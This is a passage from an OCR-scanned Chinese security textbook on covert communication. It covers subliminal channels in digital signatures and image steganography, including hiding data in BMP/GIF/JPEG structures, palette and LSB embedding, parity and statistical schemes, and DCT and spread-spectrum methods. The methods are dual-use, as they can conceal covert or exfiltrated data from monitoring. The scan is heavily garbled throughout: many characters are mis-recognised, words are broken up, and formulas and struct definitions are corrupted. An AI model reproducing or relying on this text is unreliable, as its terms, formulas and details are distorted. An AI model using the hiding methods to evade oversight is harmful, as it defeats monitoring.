的 结果 中 很 容易 地 发 现 所 传输 命令 的 明文 。AckCmd 也 没有 试图 在 任务 列表 中 隐藏 ,可 以 
在 任务 列表 中 发 现 并 结束 其 运行 。 


444 基于 阅 下 信道 的 隐秘 通信 


闷 下 信道 的 概念 是 G. J. Simmons 于 1978 年 提出 的 。 他 给 出 的 阔 下 信道 描述 性 定义 
是 : 它 存在 于 诸如 密码 系统 、 认 证 系统 ,数字 签名 方案 等 密码 协议 中 ,该 信道 在 发 送 者 和 隐 
藏 的 接收 者 之 间 传 输 秘 密 的 信息 ,该 信息 不 会 被 公众 和 信道 管理 者 所 发 现 。 

这 是 一 个 狭义 的 定义 , 另 一 种 冰 下 信道 的 广义 定义 是 : 公开 的 有 意义 的 信息 仅仅 是 充 
当 了 秘密 的 载体 ,秘密 信息 通过 它 进行 传输 。 这 就 是 阅 下 信道 的 概念 。 

目前 ,研究 人 员 发 现 的 阔 下 信道 主要 存在 于 数字 签名 方案 中 。 许 多 数字 签名 方案 都 有 
类 似 的 形式 ,以 美国 数字 签名 标准 DSA 和 ELGamal 签名 方案 为 例 ,其 签名 都 为 三 元 组 
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(HH(z); r,s)。 当 然 , 对 于 要 签名 或 传输 的 信息 zx, 可 以 对 信息 进行 预 处 理 ( 如 编码 .压缩 等 ) ， 
以 更 有 效 地 利用 信道 。 当 消息 z 比较 大 时 ,可 以 使 用 哈 希 函数 = 甩 (z) 对 消息 作 摘 要 。 

假设 hr、s 长 度 均 为 工 , 那 么 ,为 传递 | log:z | res-: 比 特 消息 签名 ,实际 传输 量 为 
2L 十 [logsx | 。 所 有 这 种 形式 的 签名 方案 ,其 被 伪造 、. 算 改 或 被 其 他 消息 替换 的 可 能 性 大 约 
是 2 并。 也 就 是 说 ,2 的 附加 信息 中 有 一 半 是 用 来 提供 签名 安全 的 ,而 另 一 半 则 可 作 阔 下 信 
道 。 这 样 ,发 送 方 可 以 将 秘密 信息 隐藏 于 签名 之 中 ,然后 接收 方 可 以 用 事先 约定 好 的 某 种 协 
议和 方法 恢复 出 阔 下 信息 。 于 是 ,通过 交换 完全 无 害 的 签名 消息 ,双方 可 以 秘密 地 传送 信 
息 ,并且 可 以 骗 过 监视 所 有 通信 的 监听 者 。 


445 常用 音频 视频 隐 写 技术 
1. 结构 隐 写 法 


由 于 图 像 处 理 软件 在 显示 图 像 时 对 图 像 格式 中 存在 的 元 余数 据 不 进行 解析 ,因此 可 
以 将 秘密 信息 隐藏 在 图 像 的 元 余 位 置 以 达到 隐藏 秘密 信息 的 目的 。 最 简单 的 图 像 结构 隐 
藏 方法 是 文件 合并 法 ,只 需 将 要 隐藏 的 秘密 信息 先 保存 为 文本 文件 ,假设 保存 为 001. txt。 
再 随意 找 一 张 图 片 作为 载体 ,假设 它 的 文件 名 为 002. JPEG。 如 果 把 它们 都 放 在 C 盘 根 目 
录 下 ,那么 在 Windows 的 MS-DOS 方式 下 执行 以 下 命令 ,C:\Copy 002. JPEG /b 十 001 
. txt/a003.JPEG。 其 中 参数 /b 指定 以 二 进 制 格 式 复制 ,合并 文件 ; 参数 /a 指定 以 ASCII 
格式 复制 ,合并 文件 。 执 行 该 命令 会 生成 一 个 新 文件 003. JPEG。 它 与 002. JPEG 的 图 片 浏 
览 效果 一 样 ,但 隐藏 的 信息 则 在 002. JPEG 的 尾部 。 目 前 , Internet 上 公布 的 Masker、 
Cloak, Invisible Secrets、Hide and Encrypt、DataStealthSafe & Quick 、Hide Files and 
Folders、JpegX、StegaNography、Data Stash 和 PGE 等 十 几 种 隐 写 软件 都 采用 了 基于 结构 
的 隐藏 方法 。 这 种 隐 写 方法 的 优点 是 技术 门槛 低 , 隐 写 容量 几乎 是 无 限制 的 ,但 是 缺点 也 很 
明显 : 隐蔽 性 不 好 ,攻击 者 很 容易 提取 出 完整 的 隐 写 信息 并 破解 。 下 面具 体 介绍 Internet 
上 常用 的 BMP、GIF 和 JPEG 图 片 的 格式 。 

(1) BMP 文件 格式 

BMP(Bitmap-File) 图 像 文 件 是 在 Windows 下 广泛 采用 的 图 形 文 件 格式 。Windows 3.0 以 
前 的 BMP 图 像 文 件 格式 与 显示 设备 有 关 , 把 这 种 BMP 图 像 文件 格式 称 为 设备 相关 位 图 
DDB(Device-Dependent Bitmap) 文 件 格 式 。Windows 3.0 以 后 的 BMP 图 像 文件 与 显示 设 
备 无 关 , 把 这 种 BMP 图 像 文 件 格式 称 为 设备 无 关 位 图 DIB(Device-Independent Bitmap) 格 
式 。 基 于 调 色 板 的 BMP 文件 由 四 个 部 分 组 成 : 文件 头 ,信息 头 、 调 色 板 和 图 像 像 素 , 而 真 彩 
色 的 BMP 文件 则 由 文件 头 、 信 息 头 和 BGR 图 像 像 素 构成 。 

WINDOWS. H 中 所 定义 的 BMP 文件 头 (Bitmap File Header) 数 据 结构 如 下 : 

Typedef struct tag BITMAP FILE HEADER 

{ 


WORD bfType; 图 像 文 件 形态 ,固定 为 "BMP" , 依 此 判断 是 否 为 BMP 图 像 文 件 ; 
DWORD bfSize; 表示 图 像 文 件 大 小 ; 

Word bfReserved1; 保留 未 用 ,此 域 应 设 定 为 零 ; 

Word bfReserved2; 保留 未 用 ,此 域 应 设 定 为 零 ; 

DWORD bfOffBits; 图 像 数 据 的 偏 移 量 ,表示 文件 起 始 位 置 到 图 像 数 据 的 距离 ; 
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} BITMAPFILEHEADER; 
Typedef BITMAPFILEHEADER FAR x LPBITMAPFILEHEADER; 
Typedef BITMAPFILEHEADER * LPBITMAPFILEHEADER; 


WINDOWS. H 中 所 定义 的 BMP 信息 头 (BITMAPINFOHEADER) 数 据 结构 如 下 : 


TYpedef struct tagBITMAPINFOHEADER 
{ 

DWORD biSize; 表示 数据 结构 的 大 小 , 据 此 判断 是 Windows 或 0S/2 的 BMP 图 像 文 件 ,其 值 分 别 
为 40 和 12; 

DWORD biWidth; 图 像 的 宽度 (以 像素 为 单位 ); 

DWORD biHeight; 图 像 的 高 度 ( 以 像素 为 单位 )， 

WORD biPlanes; 图 像 的 色彩 平面 数 ,其 值 固定 为 1, 即 三 种 颜色 数据 是 存储 在 一 起 的 ; 

WORD biBitCount; 每 个 像素 所 需 位 数 ,其 取 值 可 为 : 1,4,8,24; 

DWORD biCompression; 图 像 数 据 的 压缩 格式 ,有 三 种 : BI_RGB、BI_RLE8 和 BI_RLE4; 

DWORD biSizeImage; 图 像 数 据 的 大 小 (以 字 节 为 单位 )， 

DWORD biXPelsPerMeter; 图 像 的 水 平分 辩 率 ; 

DWHORD biYPelsPerMeter; 图 像 的 垂直 分 辩 率 ; 

DWORD biClrUsed; 图 像 实 际 使 用 的 色彩 数目 ; 

DWORD biClrImportant; 图 像 中 重要 的 色彩 数目 ; 
} BITMAPINFOHEADER; 
Typedef BITMAPINFOHEADER FAR * LPBITMAPINFOHEADER; 
Typedef BITMAPINFOHEADER * LPBITMAPINFOHEADER; 


WINDOWS. H 中 所 定义 的 调 色 板 (RGBQUAD) 数 据 结 构 如 下 : 


Typedef struct tagRGBQUAD 
{ 
BYTE rgbBlue; 
BYTE rgbGreen; 
BYTE rgbRed; 
BYTE rgbReserved; 

}RGBQUAD; 

BMP 图 像 像素 数据 的 存储 顺序 是 由 下 往 上 ,而 图 像 的 宽度 (以 字 节 为 单位 ) 必 须 是 4 的 
倍数 ,如 果 不 到 4 的 倍数 则 必须 补足 。 虽 然 BMP 的 图 像 数 据 有 BI_RLE8 及 BI_RLE4 两 种 
压缩 格式 ,但 是 使 用 的 人 却 极 少 ,几乎 所 有 的 BMP 都 采用 没有 压缩 的 BL_RGB 格式 来 存储 
数据 。 对 于 真 彩 图 像 , 没 有 调 色 板 而 由 BGR 像素 直接 表示 颜色 。 

由 于 BMP 图 像 文件 结构 比较 单一 且 固 定 。 经 过 多 方面 实验 发 现在 不 影响 图 像 正常 显 
示 的 情况 下 ,BMP 图 像 文 件 能 进行 信息 隐藏 的 方法 有 以 下 几 种 。 

。 在 图 像 文 件 尾 可 附加 任意 长 度 的 数据 ; 
。 修改 文件 头 和 信息 头 的 保留 字段 达到 隐藏 数据 的 目的 ; 
。 在 图 像 像素 区 利用 图 像 宽 度 字 节 必 须 是 4 的 倍数 的 特点 ,在 补足 位 隐藏 数据 。 

(2) GIF 文件 格式 

GIF(Graphics Interchange Format) 是 CompuServe 公司 开发 的 图 像 文件 存储 格式 。 
1987 年 开发 的 GIF 文件 格式 版 本 号 是 GIF87a,1989 年 进行 了 扩充 ,扩充 后 的 版 本 号 定义 
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为 GIF89a。GIF 图 像 文件 以 数据 块 (block) 为 单位 来 存储 图 像 的 相关 信息 。 一 个 GIF 文件 
由 表示 图 像 的 数据 块 . 数 据 子 块 以 及 显示 图 像 的 控制 信息 块 组 成 , 称 为 GIF 数据 流 (data 
stream) 。 数 据 流 中 的 所 有 控制 信息 块 和 数据 块 都 必须 在 文件 头 C(header) 和 文件 结束 块 
(trailer) 之 间 。GIF 文件 格式 采用 了 LZW(Lempel-Ziv Walch) 压 缩 算 法 来 存储 图 像 数 据 ， 
定义 了 人 允许 用 户 为 图 像 设置 背景 的 透明 (transparency) 属 性 。 此 外 ,GIF 文件 格式 还 可 在 一 
个 文件 中 存放 多 幅 彩 色 图 像 。 如 果 在 GIF 文件 中 存放 有 多 幅 图 ,它们 可 以 像 演 幻灯 片 那 样 
显示 或 者 像 动 画 那 样 演示 。 

GIF 图 像 文件 一 般 可 包括 文件 头 信息 、 屏 幕 描述 块 、 全 域 调 色 板 数据 .图像 描 述 块 . 区 域 
调 色 板 数据 图像 压 缩 数 据 、 图 形 控 制 扩 充 块 、 图 形 说 明 扩 充 块 、 注 解说 明 扩 充 块 .应 用 程序 
扩充 块 和 文件 结尾 块 。GIF 文件 的 典型 结构 如 表 4. 2 所 示 。 


表 4.2 GIF 文 件 结构 


序号 字段 名 称 功能 解释 说 明 
1 Header GIF 文件 头 
2 Logical Screen Descriptor 逻辑 屏幕 描述 块 
3 Global Color Table 全 局 彩色 表 
… 扩展 模块 ( 任 选 ) … 
4 Jmage Descriptor 形 描述 块 
5 Local Color Table 局 部 彩色 表 ( 可 重复 次 ) 
6 Table Based Image Data 表 式 压缩 图 像 数 据 
7 Graphic Control Extension 图 像 控 制 扩 展 块 5 和 6 可 重复 多 次 
8 Plain Text Extension 无 格式 文本 扩展 块 
9 Comment Extension 注释 扩展 块 
10 Application Extension 应 用 程序 扩展 块 
11 GIF Trailer GIF 文件 结束 块 


对 于 GIF 图 像 ,应 用 程序 扩充 块 的 Application Data 字段 ,注解 说 明 扩 充 块 的 
Comment Data 字段 ,图形 说 明 扩 充 块 的 Plain Text Data 字段 都 可 以 隐藏 任意 长 的 信息 ,图 
像 压 缩 数据 尾部 也 可 以 隐藏 任意 长 的 数据 。 

(3) JPEG 文件 格式 

JPEG(Joint Photo graphic Experts Group) 格 式 是 最 常见 的 相片 文件 格式 。 大 多 数 数 
码 相机 都 以 JPEG 格式 保存 相片 。JPEG 格式 经 常 以 .JPG 或 者 .jpg 的 文件 扩展 名 出 现 。 

以 JPEG 文件 格式 保存 的 图 像 实际 上 是 两 个 不 同 格式 的 混合 物 。 一 个 是 JPEG 格式 规 
范本 身 用 来 定义 图 像 的 压缩 方法 。 另 一 个 是 Photoshop 等 能 读 取 和 写 入 JPEG 文件 格式 的 
其 他 应 用 程序 ,以 JFIF 文件 格式 (JPEG File Interchange Format,JPEG 文件 交换 格式 ) 或 
与 JFIF 格式 非常 像 的 其 他 格式 保存 图 像 数 据 。JFIF 文件 格式 只 是 将 某 种 图 像 格式 进行 
JPEG 压缩 的 一 种 简单 方法 ,它们 没有 其 他 的 功能 。 

最 初 的 JFIF 文件 格式 规范 允许 8 位 灰 度 图 像 和 24 位 RGB 图 像 , 但 是 Adobe 修改 了 
此 种 格式 ,使 之 也 能 处 理 32 位 CMYK 模式 的 数据 。JPEG 文件 格式 还 允许 用 可 变 压 缩 的 
方法 保存 8 位 .24 位 、32 位 深度 的 图 像 。JPEG 使 用 了 有 损 压 缩 格式 ,这 就 使 它 成 为 迅速 显 
示 图 像 并 保存 较 好 分 辩 率 的 理想 格式 ,也 正 是 由 于 JPEG 格式 可 以 对 扫描 或 自然 图 像 进行 
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大 幅度 的 压缩 ,利于 储存 或 通过 调制 解 调 器 进行 传输 ,所 以 在 Internet 上 得 到 了 广泛 的 
应 用 。 

JPEG 格式 有 一 个 特殊 的 变种 ,名 为 “Progressive JPEG”。 在 创建 Progressive JPEG 文 
件 时 ,开始 只 显示 一 个 模糊 的 图 像 , 随 着 数据 的 装 人 ,图像 逐步 变 得 清晰 。 基 于 JPEG 格式 
隐藏 的 方法 与 GIF 类 似 都 是 基于 标记 的 ,其 标记 的 隐藏 性 质 如 表 4. 3 所 示 。 


表 4.3 JPEG 图 像 隐藏 标记 


标识 名 称 是 否 可 以 隐藏 标识 名 称 是 否 可 以 隐藏 
APP 标识 结构 可 以 DQT 标识 结构 不 能 
SOS 标识 结构 可 以 SOF 标识 结构 不 能 
FFD9 标识 可 以 DFT 标识 结构 不 能 


2. 调 色 板 隐 写 法 


调 色 板 图 像 是 一 种 经 常 使 用 的 图 像 格式 ,BMP 和 GIF 文件 格式 支持 调 色 板 图 像 。 调 
色 板 图 像 也 是 灰 度 图 像 采用 的 方式 。 一 般 基 于 调 色 板 的 图 像 有 两 种 嵌入 秘密 信息 的 方式 。 

在 信息 嵌入 过 程 中 改变 调 色 板 项 的 顺序 或 调 色 板 项 的 颜色 值 。 

在 信息 嵌入 以 后 ,新 的 调 色 板 与 原 有 的 调 色 板 存在 差异 。 这 种 差异 就 是 信息 隐藏 工具 
特征 分 析 的 依据 。 可 以 将 数据 嵌入 到 调 色 板 中 ,也 可 以 嵌入 到 图 像 数 据 中 。 当 信息 嵌入 到 
调 色 板 中 ,嵌入 信息 量 受到 很 大 约束 : 当 信息 嵌 入 到 图 像 数 据 中 ,嵌入 的 数据 量 与 图 像 的 尺 
才 大 小 有 关 。 

Fridrich 提出 一 种 调 色 板 隐 写 算 法 , 它 不 需 对 调 色 板 排序 ,只 利用 一 种 轻微 差别 ,计算 
最 邻近 的 颜色 值 ,直到 找到 一 个 像素 ,其 奇偶 位 (R 十 G 十 B) mod 2 与 要 编码 的 秘密 信息 匹 
配 为 止 。 找 到 后 ,此 像素 被 替换 成 这 个 新 颜色 。 还 有 一 种 隐 写 编码 技术 是 使 用 抖动 的 方法 
减少 颜色 数目 到 原来 一 半 , 且 调 色 板 颜 色 扩 倍 ,轻微 修改 所 有 备份 调 色 板 条 目 。 经 过 这 个 预 
处 理 后 ,抖动 过 的 图 像 的 每 个 颜色 值 对 应 两 个 调 色 板 条 目 , 再 选择 秘密 信息 的 0、1 值 中 的 一 
个 甬 入 Mande-lsteg、S-tool、Hide4PGP、Hide and Seek。 早 期 的 隐 写 软件 版 本 都 采用 了 此 
种 方法 。 

在 信息 嵌入 过 程 中 ,不 改变 调 色 板 的 顺序 和 调 色 板 项 的 颜色 值 。 

但 是 在 嵌入 过 程 中 ,可 能 需要 对 调 色 板 进行 临时 调整 , 减 小 图 像 的 降 质 ,完成 嵌入 后 再 
恢复 调 色 板 原始 的 状态 。 由 于 调 色 板 没有 改变 ,无 法 从 调 色 板 中 寻求 信息 隐藏 工具 的 特征 。 
采用 这 种 方法 的 信息 隐藏 工具 有 Ezstego 等 。 


3. 空域 隐 写 法 


空域 LSB 信息 隐藏 是 最 早 提出 的 图 像 信息 隐藏 算法 ,虽然 鲁 棒 性 比 变换 域 方法 差 ,但 
因为 隐藏 数据 量 大 和 算法 简单 的 优点 成 为 目前 隐蔽 通信 中 的 主流 技术 。 互 联网 上 的 信息 隐 
藏 工具 中 大 多 使 用 了 空域 LSB 方法 。 

(1) 基于 位 平面 的 代替 隐 写 

@ LSB 代 蔡 : 目前 很 多 公开 的 隐 写 软件 都 采用 此 种 方式 ,具体 LSB 替换 技术 可 分 六 
情况 。 
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秘密 信息 在 位 平面 0 连续 嵌入 至 结束 ,余下 部 分 不 作 任何 处 理 (MandelSteg) 。 
秘密 信息 在 位 平面 0 连续 嵌入 后 ,余下 部 分 随机 化 处 理 , 也 称 沙化 处 理 
(PGMStealth) 。 
”秘密 信息 在 位 平面 1 和 0 连续 嵌入 ,同时 嵌入 位 平面 1 和 0(In The Picture2. 2) 。 
秘密 信息 在 位 平面 1 和 0 连续 嵌入 , 待 位 平面 0 嵌 满 后 才 对 位 平面 1 嵌入 
(Hide4PGP1.0) 。 

。 秘密 信息 在 位 平面 1 和 0 扩散 式 岩 入 , 待 0 平 面 嵌 满 后 才 对 1 平面 嵌入 

(Hide4PGP2.0)。 

。 秘密 信息 在 位 平面 0 跳跃 式 (随机 间隔 ) 嵌 入 (S-tool,Steganos) 。 

其 他 如 StegoDos、EzStego、Hideand Seek、White Noise Storm 等 都 采用 LSB 代替 方式 
隐 写 。 

@ 伪 随 机 代替 : 如 果 在 嵌入 过 程 中 能 获得 所 有 载体 图 像 的 位 ,那么 秘密 信息 就 可 以 随 
机 地 分 散 嵌 入 到 整个 载体 中 ,而 不 考虑 消息 位 的 顺序 ,增加 了 攻击 的 复杂 度 。 

由 于 对 伪 随 机 数 发 生 器 的 输出 不 加 限制 ,一 个 索引 值 在 序列 中 出 现 多 次 ,就 会 产生 碰 
撞 , 从 而 可 能 在 一 个 载体 信息 元 素 中 典 入 多 个 信息 位 ,破坏 了 原先 嵌入 的 信息 。 所 以 在 嵌入 
秘密 信息 长 度 增加 到 一 定 程度 时 ,碰撞 问题 必须 考虑 。 避 免 碰撞 的 办 法 之 一 就 是 建立 一 个 
集合 B, 记 录 使 用 过 的 载体 元 素 ,接收 方 采用 同样 的 方法 。 

@ 图 像 降级 和 隐藏 信道 : 图 像 降级 指 的 是 图 像 安 全 级 别 的 降低 。 由 于 秘密 信息 被 隐 
藏 于 普通 图 像 中 ,破坏 了 多 级 安全 操作 系统 的 “不 能 下 写 " 原 则 ,从 而 形成 隐蔽 信道 。 

1992 年 人 们 利用 隐 写 技术 ,把 秘密 图 像 嵌 入 到 相同 尺寸 的 一 幅 普 通 图 像 中 , 即 把 载体 
图 像 的 低 4 位 替换 成 秘密 图 像 的 高 4 位 ,然后 以 普通 图 像 携带 秘密 图 像 传 输 到 低级 别 的 载 
体 中 。 这 种 隐 写 方法 和 LSB 代替 法 无 本 质 区 别 。 

@ 隐藏 区 域 和 奇偶 位 校 验 : 载体 区 域 指 任何 一 个 非 空 子 集 {a1 ，,… ,cum }。 通 过 把 载体 
分 成 不 相 邻 区 域 , 能 够 在 一 个 载体 区 域 ( 非 单个 像素 ) 中 储存 1 比特 的 信息 。 一 个 区 域 工 的 
奇偶 校 验 位 能 通过 下 式 计算 : 


p(D = >)LSBCc)mod 2 


jiET 


性 入 过 程 中 ,首先 选择 1(m) 个 不 相 邻 区 域 I (1 三 i 过 1(m)), 每 个 区 域 在 奇偶 检验 位 
p(1;) 上 风 入 1 个 信息 比特 mx;。 如 果 一 个 载体 区 域 的 奇偶 检验 位 与 m; 不 匹配 , 则 将 中 
所 有 值 的 最 低 一 个 比特 位 置 反 ,导致 p(1;) 二 m;。 译 码 过 程 中 ,计算 所 有 区 域 的 奇偶 检验 
位 ,排列 起 来 就 可 以 重 构 消息 。 另 外 ,使 用 隐 写 密 钥 作 种 子 , 能 用 伪 随 机 方式 构造 载体 
区 域 。 

由 于 发 送 者 可 以 选择 修改 载体 区 域 中 的 某 一 个 元 素 ,从 而 可 使 其 对 载体 的 统计 特性 改 
变 最 小 。 并 且 嵌 入 过 程 对 载体 的 影响 随 着 一 个 载体 区 域 中 元 素 的 增多 而 减少 ,所 以 在 许多 
情况 下 是 会 有 用 的 。 

@ 统计 隐 写 方法 :“1- 比 特 ” 隐 写 方案 是 在 载体 中 嵌入 一 个 比特 ,统计 隐 写 技术 以 
“1- 比 特 ” 隐 写 方案 为 基础 的 。 具 体 描 述 如 下 : 若 传输 是 “1” ,就 对 载体 的 一 些 统计 特性 显著 
地 修改 ; 否则 ,对 载体 原封 不 动 。 所 以 接收 者 必须 能 区 分 哪些 位 置 被 修改 了 。 

为 了 从 多 个 “1- 比 特 ” 信 息 隐藏 系统 构造 一 个 1(m) 位 隐 写 系统 ,要 把 一 个 载体 信息 划分 
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为 1(m) 个 不 相交 的 块 {B1 ,…,Bum }。 一 个 秘密 比特 wm; 按 如 下 方式 插入 到 第 i 块 中 : 若 
mi 二 1, 则 把 1” 放 入 B; 中 。 否 则 ,该 块 在 嵌入 过 程 中 保持 不 变 。 一 个 特定 的 检测 是 用 一 个 
检验 函数 来 实现 的 。 该 函数 按 如 下 方式 区 分 未 改变 载体 信息 和 已 改变 的 载体 信息 : 


1， 如 果 块 B; 在 嵌入 过 程 中 被 修改 
f(B,) = 
0， 如 果 块 B; 在 嵌入 过 程 中 未 修改 


函数 了 可 解释 为 一 个 假设 检验 函数 。 检 验 原 假 设 为 块 B; 未 作 修改 ”, 备 选 假 设 为 “ 块 B; 已 
作 修 改 ”。 因 此 ,可 以 把 这 样 一 类 隐 写 系统 称 为 统计 隐 写 系统 。 接 收 方 把 了 逐次 应 用 于 所 
有 的 载 秘 数据 块 B; 以 恢复 每 个 秘密 信息 位 。 

首要 问题 是 如 何 构 造 上 式 中 的 函数 f。 若 把 了 解释 为 一 个 假设 检验 函数 , 则 可 利用 数 
理 统计 中 的 假设 检验 理论 。 假 定 能 找到 一 个 函数 h(B;), 它 依赖 于 载 秘 数据 块 B; 的 某 些 元 
素 , 并 且 知 道 未 修改 块 h(B;) 的 分 布 。 我 们 就 可 以 用 标准 的 步 又 测试 h(B;) 是 否 等 于 或 大 于 
某 个 特定 值 。 如 果 在 嵌入 过 程 中 块 B; 未 被 修改 ,其 期 望 值 为 0, 否则 期 望 值 较 大 ,以 这 种 方 
式 控制 修改 4(B,;) , 则 能 够 在 给 定 h(B,) 的 分 布 情况 下 ,检验 h(B,) 是 否 等 于 0。 

然而 ,实际 应 用 中 ,首先 是 好 的 统计 检验 函数 h(B;) 难 找 , 其 次 h(B,) 在 载体 信息 中 的 分 
布 较 难 确定 。 典 型 的 统计 隐 写 技术 有 Bender 等 人 提出 的 Patchwork 隐 写 方法 和 Pitas 提 
出 的 隐 写 系统 。 它 们 都 有 较 强 的 稳健 性 。 

@) 载体 生成 技术 : 密码 学 中 的 “一 次 一 密 ” 技 术 所 产生 的 乱 数 相互 独立 ,无 相关 性 , 因 
此 依赖 这 种 技术 的 密码 系统 的 安全 性 独立 于 攻击 者 的 可 用 计算 能 力 。 是 否 隐 写 编码 中 也 存 
在 这 样 的 技术 呢 ? 

载体 生成 技术 是 人 们 比较 看 好 的 一 项 技术 ,目前 较 多 应 用 于 文本 文件 中 。 如 果 在 图 像 
隐 写 中 假定 秘密 消息 相对 比较 短 , 则 可 以 生成 或 找到 满足 条 件 的 一 幅 图 像 ,而 这 幅 图 像 未 作 
任何 修改 是 可 能 的 。 但 对 于 “ 较 短 ” 的 假定 不 大 可 行 , 因 为 通信 和 量 如果 比 较 频 繁 的 话 , 必 须 进 
行 大 量 的 寻找 才 可 能 找到 一 幅 满足 条 件 的 图 像 。 

(2) 二 值 图 像 隐 写 

二 值 图 像 以 黑白 像素 分 布 方式 包含 元 余 。 尽 管 可 实现 一 个 简单 的 蔡 代 隐 写 系统 ,但 这 
些 系统 很 容易 受 传输 误差 的 影响 ,因此 稳健 性 不 好 。 

Zhao 和 Koch 提出 一 个 隐 写 方案 ,利用 一 个 特定 的 图 像 区 域 中 黑 像素 的 个 数 来 编码 秘 
密 信 息 。 为 了 增加 系统 对 传输 错误 和 图 像 修 改 的 稳健 性 ,引入 两 个 阔 值 和 一 个 稳健 参数 来 
调整 嵌入 处 理 。Matsui 和 Tanaka 提出 的 另 一 个 隐 写 方案 是 利用 无 损 压 缩 系统 对 传真 文档 
进行 信息 编码 。 依 据 二 值 图 像 连续 像素 同 种 颜色 概率 很 高 这 一 特性 ,修改 游程 长 度 达到 编 
码 的 目的 。 

(3) 其 他 空间 域 隐 写 

Q@ 量化 和 抖动 : 数字 图 像 的 抖动 和 量化 都 能 用 于 隐藏 秘密 信息 。Matsui 和 Tanaka 基 
于 图 像 量 化 操作 提出 两 种 隐 写 系统 。 其 一 是 利用 图 像 相 邻 像素 的 高 度 相关 性 使 差分 信号 的 
量化 值 接近 于 0, 来 达到 隐 写 目的 。 另 外 一 种 是 利用 预测 编码 量化 误差 达到 隐 写 目的 ,借助 
一 个 隐 写 密 钥 表 实现 调整 差分 信号 的 值 ,嵌入 秘密 信息 。Baharav 和 Shaked 提出 一 种 利用 
信号 抖动 处 理 过 程 插入 秘密 信息 的 隐 写 方案 。 

@ 失真 技术 : 与 替代 系统 相 比 ,失真 技术 在 解码 时 需要 原始 的 载体 信息 。Alice 为 得 
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到 一 个 载 秘 图 像 , 对 载体 图 像 按 某 种 次 序 进 行 修改 ,这 种 次 序 根据 需要 传输 的 秘密 信息 而 
定 。Bob 为 重 构 Alice 采用 的 修改 次 序 ,必须 测量 载 秘 图 像 与 原 载体 的 差异 。 由 于 在 实际 
应 用 中 接收 者 必须 用 到 原始 载体 图 像 ,所 以 此 系统 并 不 实用 。 因 为 车 Wendy 也 能 获得 原始 
载体 ,Wendy 就 很 容易 检测 到 载体 是 否 被 修改 ,从 而 获得 秘密 通信 的 证 据 。 若 戏 人 和 提取 
函数 是 公开 的 并 且 没 有 隐 写 密 钥 保护 的 , Wendy 也 可 能 完全 重 构 秘 密 信息 。 因 此 ,本 节 中 
假定 原始 载体 图 像 能 通过 一 个 安全 通道 传输 。 

失真 技术 应 用 到 数字 图 像 上 ,与 替代 系统 方法 类 似 。 发 送 者 首先 选择 用 于 信息 传输 的 
1(m) 个 不 同 的 载体 像素 。 这 种 选择 可 以 通过 伪 随 机 数 发 生 器 或 伪 随 机 置换 来 实现 。 发 送 
者 若 在 像素 中 对 0 进行 编码 , 则 保持 像素 不 变 ; 车 对 1 编码 , 则 在 像素 的 颜色 值 中 加 上 一 个 
随机 值 Az。 尽 管 这 种 方法 与 替换 系统 相似 ,但 是 却 有 一 个 显著 的 区 别 , 即 所 选 颜色 值 的 
LSB 并 不 一 定 等 于 秘密 信息 比特 位 。 特 别 是 在 编码 0 时 不 需要 修改 载体 。 


4. 变换 域 隐 写法 


空域 隐 写 算法 虽然 比较 容易 实现 ,但 抗 修改 的 能 力 较 弱 ,甚至 连 图 像 格式 转换 时 的 有 损 
压缩 都 可 将 戏 入 秘密 信息 全 部 丢失 。 与 空域 隐 写 法 相 比 ,变换 域 法 对 于 压缩 .修剪 等 处 理 的 
稳健 性 更 强 ,而且 能 够 保持 对 人 类 感官 的 不 可 察觉 性 。 目 前 已 有 多 种 变换 域 法 。 比 较 典 型 
的 方法 是 把 信息 嵌入 到 宿主 图 像 中 的 DCT 系数 中 。DCT 变换 既 可 以 针对 整个 宿主 图 像 ， 
也 可 以 针对 宿主 图 像 的 局 部 数据 块 。 但 在 嵌入 载体 的 信息 量 和 稳健 性 之 间 有 一 个 折 中 。 许 
多 用 于 有 损 和 无 损 格式 之 间 转 化 的 变换 方法 与 图 像 格式 无 关 。 本 节 主 要 讨论 一 些 常用 变换 
域 算法 的 原理 。 

(1) DCT 域 隐 写 原理 

二 维 DCT 变换 是 数字 图 像 有 损 压缩 (JPEG) 系统 的 核心 。JPEG 系统 首先 将 RGB 色 
彩 空间 图 像 转换 为 YCbCr 空间 图 像 ,并 按 8 X 8 像素 将 颜色 平面 划分 成 块 ,每 个 块 使 用 
FDCT 进行 变换 ,得 到 64 个 DCT 系数 值 , 之 后 对 所 有 系数 量化 ( 即 除 一 个 预先 定义 的 量化 
值 并 取 整 ) ,量化 后 ,对 系数 进行 婧 编码 ,编码 算法 有 两 种 : Huffman 编码 和 算术 编码 ,目前 
常用 Huffman 编码 。 解 码 过 程 相反 ,由 于 量化 为 有 损 变换 (过 程 不 可 逆 ) ,所 以 隐 写 嵌入 一 
般 在 解码 的 量化 前 或 量化 中 进行 。 

陈 剑 等 提出 一 种 算法 ,利用 修改 高 频 系 数 戏 入 ,由 于 人 有 眼 对 高 亮度 色彩 更 敏感 ,所 以 在 
嵌入 量 不 大 时 ,只 将 数据 隐藏 在 色 度 高 频 系 数 中 或 只 修改 色 度 高 频 系数 中 的 部 分 ,以 减少 图 
像 变化 。 该 算法 嵌入 量 较 大 时 ,稳健 性 较 弱 。 

Zhao 和 Koch 提出 一 种 算法 对 色 度 中 频 系 数 中 系数 值 相近 的 三 个 系数 进行 修改 , 且 修 
改 时 引入 了 一 个 参数 D 来 描述 一 个 嵌入 位 所 需 的 两 个 系数 的 最 小 距离 ,D 越 大 ,稳健 性 越 
强 。 该 算法 由 于 应 用 到 中 频 系数 ,所 以 其 嵌入 量 较 小 ,但 稳健 性 可 根据 需要 调整 。 

(2) 扩 频 技术 (SS 技术 ) 原 理 

扩 频 技术 也 就 是 扩展 频谱 技术 ,是 指 信号 在 大 于 所 需 带 宽 内 传输 。 带 宽 扩 展 是 通过 一 
个 与 数据 独立 的 码 字 完成 的 ,并 且 在 接收 端 对 这 个 码 字 的 同步 接收 被 用 于 解 扩 和 随后 的 数 
据 恢 复 。 其 特点 是 : 每 个 频段 上 的 信 噪 比 很 小 ,即使 部 分 信号 在 几 个 频段 丢失 ,其 他 频段 仍 
有 足够 的 信息 用 来 恢复 信号 。 因 此 要 检测 和 删除 一 个 SS 信号 很 困难 。SS 技术 与 隐 写 技术 
相似 ,试图 在 整个 载体 中 扩展 秘密 信息 ,以 达 信 息 到 不 可 察觉 的 目的 。SS 技术 的 稳健 性 很 
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好 。 隐 写 中 使 用 两 个 特殊 的 SS 变 体 , 即 直接 序列 扩 频 和 跳 频 扩 频 。 直 接 序列 扩 频 是 秘密 
